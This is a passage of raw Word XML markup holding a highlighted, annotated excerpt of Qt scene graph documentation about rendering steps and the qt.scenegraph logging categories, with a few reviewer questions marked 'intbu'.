          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>software rasterization</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using an OpenGL framebuffer object (FBO)</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, so the </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">rendering is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two-step operation</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>First</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rasterize the surface, then </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>draw</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the surface. Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph API</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly is always </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>significantly faster</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00E63735">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1662" w:name="logging-support"/>
      <w:bookmarkStart w:id="1663" w:name="_Toc483000891"/>
      <w:bookmarkStart w:id="1664" w:name="_Toc483003882"/>
      <w:bookmarkStart w:id="1665" w:name="_Toc483604235"/>
      <w:bookmarkStart w:id="1666" w:name="_Toc483605455"/>
      <w:bookmarkEnd w:id="1662"/>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logging Support</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1663"/>
      <w:bookmarkEnd w:id="1664"/>
      <w:bookmarkEnd w:id="1665"/>
      <w:bookmarkEnd w:id="1666"/>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The scene graph has support for a number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logging categories</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These can be useful in tracking down both </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>performance issues</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in addition to being helpful to Qt contributors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.time.texture</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- logs the </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>time spent doing texture uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.time.compilation</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- logs the time spent doing </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shader compilation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.time.renderer</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- logs the time spent in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>various steps of the renderer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.time.renderloop</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- logs the time spent in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>various steps of the render loop</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu difference between render loop and renderer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.time.glyph</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- logs the time spent preparing </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>distance field glyphs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.general</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- logs </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>general information</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> about various parts of the scene graph and the graphics stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.renderloop</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>detailed log</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the various stages involved in rendering. This log mode is </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>primarily useful for developers working on Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00974C4A" w:rsidRPr="00E63735" w:rsidRDefault="00E63735" w:rsidP="00974C4A">
      <w:pPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="165"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu how is it possible to use this logging.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="00B86726" w:rsidRDefault="001113FB" w:rsidP="00B86726">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1667" w:name="scene-graph-backend"/>
      <w:bookmarkStart w:id="1668" w:name="_Toc483000892"/>
      <w:bookmarkStart w:id="1669" w:name="_Toc483003883"/>
      <w:bookmarkStart w:id="1670" w:name="_Toc483604236"/>
      <w:bookmarkStart w:id="1671" w:name="_Toc483605456"/>
      <w:bookmarkEnd w:id="1667"/>
      <w:r w:rsidRPr="00B86726">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scene Graph Backend</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1668"/>
      <w:bookmarkEnd w:id="1669"/>
      <w:bookmarkEnd w:id="1670"/>
      <w:bookmarkEnd w:id="1671"/>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86726">
        <w:rPr>
